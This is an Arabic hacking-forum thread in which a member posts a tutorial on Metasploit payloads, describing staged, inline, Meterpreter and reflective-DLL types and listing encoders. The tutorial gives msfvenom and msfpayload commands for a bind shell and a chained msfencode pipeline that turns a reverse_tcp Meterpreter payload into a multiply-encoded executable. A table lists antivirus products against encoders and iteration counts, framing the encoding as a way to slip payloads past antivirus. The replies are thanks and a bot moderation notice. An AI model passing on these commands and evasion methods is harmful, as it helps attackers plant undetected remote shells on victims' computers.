الوسوم:
حالة الموضوع:
مغلق
  1. Mr.Ahmed erro

    Mr.Ahmed erro Developer

    الأنتساب:
    ‏6 مارس 2013
    المشاركات:
    9
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    بسم الله الرحمن الرحيم
    السلام عليكم و رحمتة الله و بركاتة

    كيفكم أعضاء و زوار شبكة عراق تيم:{8}:

    ان شاء الله الكل بخير

    .. المهم..

    درس اليوم

    9 - البايلودات و انواعها و أشكالها و تشفيرها و قوتها

    البايلودات أشكال كثيرة و انواع كثيرة



    ______________

    .. أنواعها ..
    ________________





    Inline (Non Staged

    A single payload containing the exploit and full s h e ll code for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all in one. However some exploits wont support the resulting size of these payloads.

    _____________________


    Staged

    Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

    ______________________


    Meterpreter

    Meterpreter, the short form of M e t a -Interpreter is an advanced, multi-faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required and Meterpreter development is very strong and constantly evolving.

    ____________________


    PassiveX

    PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using an ActiveX control to create a hidden instance of Internet Explorer. Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses.

    ____________________


    NoNX

    The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). The M e t a sploit NoNX payloads are designed to circumvent DEP.

    ______________________


    Ord

    Ordinal payloads are Windows stager based payloads that have distinct advantages and disadvantages. The advantages being it works on every flavor and language of Windows dating back to Windows 9x without the explicit definition of a return address. They are also extremely tiny. However two very specific disadvantages make them not the default choice. The first being that it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploitation. The second being that it's a bit less stable than the other stagers.

    ___________________


    IPv6

    The M e t a sploit IPv6 payloads, as the name indicates, are built to function over IPv6 networks.

    ___________________


    Reflective DLL injection


    Reflective DLL Injection is a technique whereby a stage payload is injected into a compromised host process running in memory, never touching the host hard drive. The VNC and Meterpreter payloads both make use of reflective DLL injection. You can read more about this from Stephen Fewer, the creator of the reflective DLL injection method.
    ________________


    أشكالها


    aix


    bsd


    bsdi


    cmd


    generic


    java


    linux


    netware


    osx


    php


    solaris


    tty


    windows

    _________________


    و لصنعها تقدر بطرق كثيرة

    مثل

    Msfvenom

    مثل



    [NOTE]msfvenom -p windows/s h e ll/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3[/NOTE]




    او
    Msfconsole

    مثل


    [NOTE]msf payload(s h e ll_bind_tcp) > generate[/NOTE]

    [NOTE]msf payload(s h e ll_bind_tcp) > generate -b '\x00'[/NOTE]

    [NOTE]msf payload(s h e ll_bind_tcp) > generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'[/NOTE]


    او

    Msfpayload

    مثل


    [NOTE]msfpayload windows/s h e ll_bind_tcp EXITFUNC=seh LPORT=1234[/NOTE] C
    و التخطي انواع

    مثل

    https

    http

    ________________


    للتشفر طرق كثيرة

    اولاً نبدأ بالتشفير بــM e t a sploit

    encodes

    أنواعها

    cmd/generic_sh
    cmd/ifs
    cmd/printf_php_mq
    generic/none
    mipsbe/longxor
    mipsle/longxor
    php/base64
    ppc/longxor
    ppc/longxor_tag
    sparc/longxor_tag
    x64/xor
    x86/alpha_mixed
    x86/alpha_upper
    x86/avoid_underscore_tolower
    x86/avoid_utf8_tolower
    x86/call4_dword_xor
    x86/context_cpuid
    x86/context_stat
    x86/context_time
    x86/countdown
    x86/fnstenv_mov
    x86/jmp_call_additive
    x86/nonalpha
    x86/nonupper
    x86/shikata_ga_nai
    x86/single_static_bit
    x86/unicode_mixed
    x86/unicode_upper


    _______________


    و تختلف على حسب قوتها و نوع البايلود المراد تشفيرة


    التشفير بــencode

    encode ليس برنامج تشفير

    هو يغير القيم في البايلود

    تحتاج الى شفرة خاصه فيك


    مثل

    مرات التشفير- encodes - antivirs



    AhnLab-V3 cmd/generic_sh 1
    AntiVir cmd/ifs 5
    Antiy-AVL cmd/printf_php_mq 10
    Avast generic/none 25
    Avast7 mipsbe/longxor 100
    AVG mipsle/longxor


    هذي شفرة قديمة

    لدمج التشفير

    مثلا



    [NOTE]msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5-t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/payload3.exe[/NOTE]


    و تقدر تشفر بطرق أخرى

    مثل

    Hex + هندسة عكسية

    و الباك دور و s h e ll code


    أخوكم

    محبكم
    Mr.Ahmed Erro
    ولا تسوا التقييم)4:")4:")6:")6:")6:" تحياتي
     
    2 شخص معجب بهذا.
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.
     
  3. Murtadha Albejawe

    Murtadha Albejawe Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    78
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    $$$
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    مشور حبيبي

    مبدع والله &:":

    :{5}:
     
  4. دحومي العطواني

    دحومي العطواني Developer

    الأنتساب:
    ‏12 مارس 2013
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    كفو ياكنغ


    واصل الى الأمام :{1}:
     
  5. صايع هكر

    صايع هكر Developer

    الأنتساب:
    ‏17 نوفمبر 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    مشكور اخي تم التقيم قبل الرد &:"​
     
  6. ThE JoCkEy

    ThE JoCkEy Developer

    الأنتساب:
    ‏27 مايو 2012
    المشاركات:
    60
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    hacker dz
    الإقامة:
    Algeria 4 ever
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    يعيطك العافـيه يآلغآلي​
     
  7. Dr.aL-jArH

    Dr.aL-jArH DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2012
    المشاركات:
    140
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    شُكراً لك أخوي .*:"
     
  8. Mr.Ahmed erro

    Mr.Ahmed erro Developer

    الأنتساب:
    ‏6 مارس 2013
    المشاركات:
    9
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    شكراااااا على المرور
    القادم افضل بفضل الله
     
  9. لعنة الهكرز

    لعنة الهكرز Developer

    الأنتساب:
    ‏12 مارس 2013
    المشاركات:
    37
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    وعليكم السلام ورحمة الله
    مجهود تشكر عليه
    ضلل هون ( لوكنت منسق شوي الموضوع كان ابداع #:" )​
     
  10. Mr.Ahmed erro

    Mr.Ahmed erro Developer

    الأنتساب:
    ‏6 مارس 2013
    المشاركات:
    9
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    رد: قنبلة:: لبايلودات و انواعها و أشكالها و تشفيرها و قوتها!

    هذا الي طلع بيدي :(
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة